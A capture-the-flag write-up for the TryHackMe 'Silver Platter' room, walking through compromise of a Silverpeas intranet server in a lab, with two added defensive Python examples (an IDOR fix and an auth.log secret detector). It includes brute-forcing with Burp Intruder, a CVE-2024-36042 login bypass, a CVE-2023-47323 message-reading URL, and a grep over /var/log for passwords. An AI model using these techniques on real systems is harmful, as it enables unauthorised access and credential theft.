###### tags: `ctf` `escalation` `web` `unix` `thm` `writeup`
https://tryhackme.com/r/room/silverplatter
### Investigate the Site
**Using ffuf:**
```sh
$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.50.131/FUZZ

assets          [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 72ms]
images          [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 72ms]
index.html      [Status: 200, Size: 14124, Words: 926, Lines: 346, Duration: 74ms]
```
**Using dirb:**
```sh
$ dirb http://10.10.50.131/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```
**Using Gobuster:**
```sh
$ gobuster dir --url http://10.10.50.131/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```
Only three elements were found (including two directories).
Disabled JavaScript in the browser and found additional information that is not visible when the page is rendered with JavaScript enabled. One form was found. Tried submitting data to the form, but every attempt returned a `405 Not Allowed` response.
Tried checking the proxy on port 8080, but nothing was found.
On the contact page, I found the following information:
`If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".`
**What is Silverpeas?** Googled it and found:
```
Silverpeas is an open-source, rich, and scalable intranet software that will help you distribute, exchange, store, and quickly find the information at the heart of your organization.
```
This indicates that the organization might have this software installed on its web servers.
---
### Internal Portal
Tried checking the portal on both web servers (ports 80 and 8080). The server is up on port 8080: `http://10.10.50.131:8080/silverpeas/defaultLogin.jsp`
Googled for known vulnerabilities in Silverpeas and found useful links:
- [CVE-2023-47322](https://www.cvedetails.com/cve/CVE-2023-47322/)
- [GitHub (CVE-2023-47322)](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47322)
- [Rhino Security Labs Research](https://rhinosecuritylabs.com/research/silverpeas-file-read-cves/)
These vulnerabilities appear relevant to our case:
- **CVE-2023-47323**: [GitHub Link](https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2023-47323)
- **CVE-2023-47322**
---
Tried logging in with the following credentials:
- User `test` - **Login or password incorrect**
- User `scr1ptkiddy` - **Login or password incorrect**
Used the "Give me a new password..." option:
- For user `test`: **Login or password incorrect**
- For user `scr1ptkiddy`: Received the following message:
```
Reset your password An email has been sent to the email address associated with your account. This message explains how to get a new password. Some time may be required prior to receiving this message. Remember to verify the message has not gone into your spam folder.
```
This confirms that the user `scr1ptkiddy` exists in the system.
---
### Brute-Forcing the Password
We have the username `scr1ptkiddy` and can try brute-forcing the password. Since generic password lists didn't work, I decided to extract words directly from the site using the following tool: `cewl http://site_ip > passwords.txt`
Next, I used the **Intruder** module from **Burp Suite** to brute-force the password.
![[Pasted image 20250121160537.png]]
A password was found: `ad......ng`.
Alternatively, we could bypass the password entry using [**CVE-2024-36042**](https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d).
**Bypass Options**:
1. Use **Burp Suite Intruder** to delete the password parameter.
2. Use the browser's **Inspector** tool to delete the block containing the password parameter.
This provided access to the portal as an administrator.
---
### Exploiting Messages Using CVE-2023-47323
Once logged in, I tested if I could read other users' messages using **CVE-2023-47323**:
```
Proof-of-Concept Exploit:
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter.
This allows an attacker to read all messages sent between users, including administrators.

URL format:
http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID]
```
Tested this on the target:
```
http://site_ip:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=1
```
The first message was successfully read: ![[Pasted image 20250121160939.png]]
To read all other messages, I used **Burp Intruder** again: ![[Pasted image 20250121161229.png]]
There were six messages in total, one of which contained SSH credentials for the user `tim`.
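As an added illustration (not Silverpeas code and not part of the original writeup), here is the class of bug behind CVE-2023-47323 in miniature: a message lookup keyed only on the ID parameter, next to the same lookup with an ownership check. The message store, user names and message texts are constructed for the example.

```python
# Added example: an insecure direct object reference (IDOR) on a message ID,
# modelled on the ReadMessage.jsp?ID= behaviour described above, and its fix.
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    msg_id: int
    sender: str
    recipient: str
    body: str


# Constructed sample inbox; names and contents are made up for this example.
MESSAGES = {
    1: Message(1, "manager", "scr1ptkiddy", "Welcome to the intranet."),
    2: Message(2, "admin", "tim", "Your SSH account has been created."),
}


class AccessDenied(Exception):
    pass


def read_message_vulnerable(msg_id, requester):
    """Looks the message up by ID only; `requester` is never consulted (IDOR)."""
    if msg_id not in MESSAGES:
        raise KeyError(msg_id)
    return MESSAGES[msg_id]


def read_message_fixed(msg_id, requester):
    """Same lookup, but the caller must be the sender or the recipient."""
    msg = MESSAGES.get(msg_id)
    # Use one error for "missing" and "not yours" so an ID sweep cannot
    # distinguish IDs that exist from IDs the caller may not read.
    if msg is None or requester not in (msg.sender, msg.recipient):
        raise AccessDenied(f"message {msg_id} not available to {requester}")
    return msg


def sweep(read, requester, ids):
    """Which IDs in `ids` does `requester` get back through `read`? (Verifies the fix.)"""
    found = []
    for i in ids:
        try:
            read(i, requester)
            found.append(i)
        except (KeyError, AccessDenied):
            pass
    return found
```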
---
### Gaining SSH Access
Logged in to the server using the credentials found in the message.
Once logged in, I located the `user.txt` file containing the user flag.
---
### Root Flag
To escalate privileges, I checked the following vectors:
- `sudo`
- `suid`
- `crontab`
None revealed immediate issues. Then I checked the OS version:
```sh
$ uname -a
Linux silver-platter 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
```
Searched for vulnerabilities in this version: https://vulmon.com/searchpage?q=linux+linux+kernel+5.15&sortby=byriskscore
---
### Testing Exploits
Ran `linux-exploit-suggester` to find kernel vulnerabilities:
`./les.sh`
Results:
- **CVE-2022-0847** (Dirty Pipe): Tested but not successful.
- **CVE-2021-4034** (PwnKit): Tested but not successful.
- **CVE-2021-3156** (Baron Samedit): Not applicable here.
No kernel exploit proved useful.
---
### Investigating Further
The user `tim` is a member of the **adm** group, allowing access to logs in `/var/log`. Searched for sensitive information:
`grep root -R /var/log/* | grep -i pass`
Found a log entry for a Docker command executed by user `tyler`:
```
/var/log/auth.log.2:Dec 13 15:44:30 silver-platter sudo: tyler : COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd......3/ ...
```
The password for `tyler` is `_Z.........3/`.
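Added example, not part of the original writeup: a small detector that scans sudo entries in an auth.log for secrets passed on the command line (the `-e DB_PASSWORD=...` pattern above), which is what made the password readable to every member of the adm group. The sample log lines are constructed and the password value is a placeholder.

```python
# Added example: flag and redact secret-like KEY=value arguments in sudo log entries.
import re

# Sudo's auth.log format: "sudo: <user> : TTY=... ; ... ; COMMAND=<command>"
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*?COMMAND=(?P<cmd>.*)$")

# KEY=value arguments whose key looks like a credential (DB_PASSWORD, API_KEY, ...)
SECRET_RE = re.compile(
    r"(?P<key>\b[A-Za-z_]*(?:PASS(?:WORD)?|SECRET|TOKEN|API_KEY)[A-Za-z_]*)=(?P<val>\S+)",
    re.IGNORECASE,
)


def find_leaked_secrets(lines):
    """Return (sudo_user, [secret keys], redacted command) for each offending line."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue  # not a sudo command entry (e.g. sshd lines)
        cmd = m.group("cmd")
        keys = [s.group("key") for s in SECRET_RE.finditer(cmd)]
        if keys:
            redacted = SECRET_RE.sub(lambda s: f"{s.group('key')}=<redacted>", cmd)
            hits.append((m.group("user"), keys, redacted))
    return hits


# Constructed sample lines modelled on the writeup's entry; the password is a placeholder.
SAMPLE_LOG = [
    "Dec 13 15:44:30 silver-platter sudo: tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; "
    "COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas "
    "-e DB_USER=silverpeas -e DB_PASSWORD=EXAMPLE_PLACEHOLDER postgres",
    "Dec 13 15:45:02 silver-platter sudo: tyler : TTY=pts/0 ; PWD=/home/tyler ; USER=root ; "
    "COMMAND=/usr/bin/apt update",
    "Dec 13 15:46:10 silver-platter sshd[1234]: Accepted password for tim from 10.0.0.5 port 4444 ssh2",
]

if __name__ == "__main__":
    for user, keys, cmd in find_leaked_secrets(SAMPLE_LOG):
        print(f"{user} passed {', '.join(keys)} on the command line: {cmd}")
```

Passing the values through `docker run --env-file` or a secrets manager keeps them out of the sudo log in the first place.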
Logged in as `tyler` and checked sudo privileges:
```
tyler@silver-platter:/home/tim$ sudo -l
[sudo] password for tyler:
Matching Defaults entries for tyler on silver-platter:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User tyler may run the following commands on silver-platter:
(ALL : ALL) ALL
```
Used `sudo su` to switch to root. Located the root flag in the root directory.
### Bonus
```
Silverpeas version is 6.3.1
Silverpeas is running on WildFly Full 26.1.1.Final (WildFly Core 18.1.1.Final) - 2.2.17.Final with the Servlet API 4.0
The server is running on Linux 5.15.0-91-generic amd64 with Ubuntu OpenJDK 64-Bit Server VM 11.0.20.1+1-post-Ubuntu-0ubuntu120.04
```